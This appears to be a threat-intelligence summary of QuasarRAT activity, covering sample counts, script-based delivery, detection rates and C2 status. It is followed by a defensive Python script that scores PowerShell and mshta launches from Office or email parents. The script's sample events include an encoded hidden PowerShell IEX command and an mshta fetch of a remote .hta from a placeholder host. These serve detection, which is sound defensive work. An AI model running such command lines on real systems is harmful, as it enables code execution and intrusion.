Daily Summary
Four new QuasarRAT samples were identified today, a 22% increase over the 7-day average of three. The trend is rising, with a notable shift towards script-based delivery mechanisms alongside traditional executables.
New Samples Detected
The new samples show a split between executable and script-based payloads. Two .exe files were accompanied by one PowerShell script (.ps1) and one HTML Application (.hta). The .exe samples continue to use generic, non-suspicious naming conventions, while the script files exhibit obfuscated code blocks, indicating an effort to bypass static analysis.
Distribution Methods
The file type distribution suggests a multi-pronged delivery approach. The .exe files are likely distributed via phishing emails with malicious attachments or via compromised software installers. The presence of .ps1 and .hta files points to ongoing campaigns that use malicious Office documents or direct script execution, typically launched from phishing lures and run through living-off-the-land binaries (LOLBins) such as PowerShell.
Detection Rate
Current detection rates for the new variants are moderate. The .exe files are flagged by approximately 65-70% of AV engines, while the obfuscated .ps1 and .hta scripts show a lower detection rate of around 40-50%. This indicates that the newer script-based variants may be evading signature-based detection at the time of initial deployment.
C2 Infrastructure
No new C2 servers were identified today. Recent infrastructure remains active, primarily hosted on compromised VPS providers with no distinct geographic concentration. This lack of new infrastructure may suggest actors are consolidating operations on existing, resilient servers.
7-Day Trend
Activity has been steady at a low baseline this week, with daily counts fluctuating between two and four samples. Today’s count represents the high end of that range, but does not yet indicate a significant surge in campaign volume.
Security Analysis
The consistent inclusion of script-based payloads (.ps1, .hta) alongside .exe files suggests actors are systematically testing and deploying multiple initial access vectors to find the path of least resistance. This is a shift from earlier, more .exe-heavy campaigns and mimics the flexible approach of commodity loaders such as Emotet. A key defensive recommendation is to monitor, and where possible block, execution of LOLBins (particularly PowerShell and mshta.exe) launched from unexpected parent processes such as email clients or Office applications, paying particular attention to command lines that carry obfuscated or encoded scripts.
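As an added illustration of the recommendation above (example code written for this summary, not tooling from the report), the following Python script scores process-creation events for the pattern the report describes: a LOLBin such as PowerShell or mshta.exe spawned by an email client or Office application, with extra weight for encoded or obfuscated command lines. The parent-process and LOLBin lists, the scoring weights, the threshold, and the Sysmon-style sample events are all constructed assumptions for the example and should be tuned to the environment.

```python
"""Score process-creation events for LOLBins spawned by Office/email parents.

All names, weights and sample events below are constructed for this example;
they are not indicators from the report.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Script hosts named in the report plus common companions (assumption).
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Parents from which a script host is rarely legitimate (assumption).
SUSPICIOUS_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe"}

# PowerShell -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
OBFUSCATION_MARKERS = (
    re.compile(r"`"),                 # backtick-split tokens
    re.compile(r"\^"),                # cmd.exe caret insertion
    re.compile(r"(?i)\[char\]\d+"),   # [char]NN concatenation
    re.compile(r"(?i)-join"),
    re.compile(r"(?i)frombase64string"),
)
MSHTA_INLINE = re.compile(r'(?i)mshta(?:\.exe)?\s+"?(?:javascript|vbscript):')
REMOTE_URL = re.compile(r"(?i)https?://")


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    score: int = 0
    reasons: List[str] = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return it if it decodes."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcessEvent) -> Finding:
    f = Finding()
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if image not in LOLBINS:
        return f
    if parent in SUSPICIOUS_PARENTS:  # the parent relation alone is worth a look
        f.score += 5
        f.reasons.append(f"{image} spawned by {parent}")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        f.score += 3
        f.reasons.append("encoded PowerShell command")
    elif B64_BLOB.search(ev.command_line):
        f.score += 2
        f.reasons.append("long base64 blob on command line")
    # Inspect both the raw command line and the decoded payload, if any.
    text = ev.command_line + (" " + decoded if decoded else "")
    hits = [p.pattern for p in OBFUSCATION_MARKERS if p.search(text)]
    if hits:
        f.score += len(hits)
        f.reasons.append("obfuscation markers: " + ", ".join(hits))
    if image == "mshta.exe" and (MSHTA_INLINE.search(ev.command_line) or REMOTE_URL.search(ev.command_line)):
        f.score += 3
        f.reasons.append("mshta with inline script or remote URL")
    return f


def triage(events: List[ProcessEvent], threshold: int = 5) -> List[Tuple[ProcessEvent, Finding]]:
    """Return events at or above the threshold, with their findings."""
    out = []
    for ev in events:
        fnd = score_event(ev)
        if fnd.score >= threshold:
            out.append((ev, fnd))
    return out


# Constructed sample events; the encoded command is built here, not captured.
_ENC = base64.b64encode(
    "IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('aGk=')))".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {_ENC}"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://example.invalid/update.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for ev, fnd in triage(SAMPLE_EVENTS):
        print(f"[{fnd.score:>2}] {_basename(ev.parent_image)} -> {_basename(ev.image)}: {'; '.join(fnd.reasons)}")
```

The parent-process relation alone reaches the threshold, matching the report's advice to treat script hosts launched by Office or mail clients as suspect regardless of arguments; the encoded-command and obfuscation checks raise the score so that the noisiest events sort to the top. Decoding the -EncodedCommand blob before pattern matching matters because markers such as FromBase64String are otherwise hidden inside the base64.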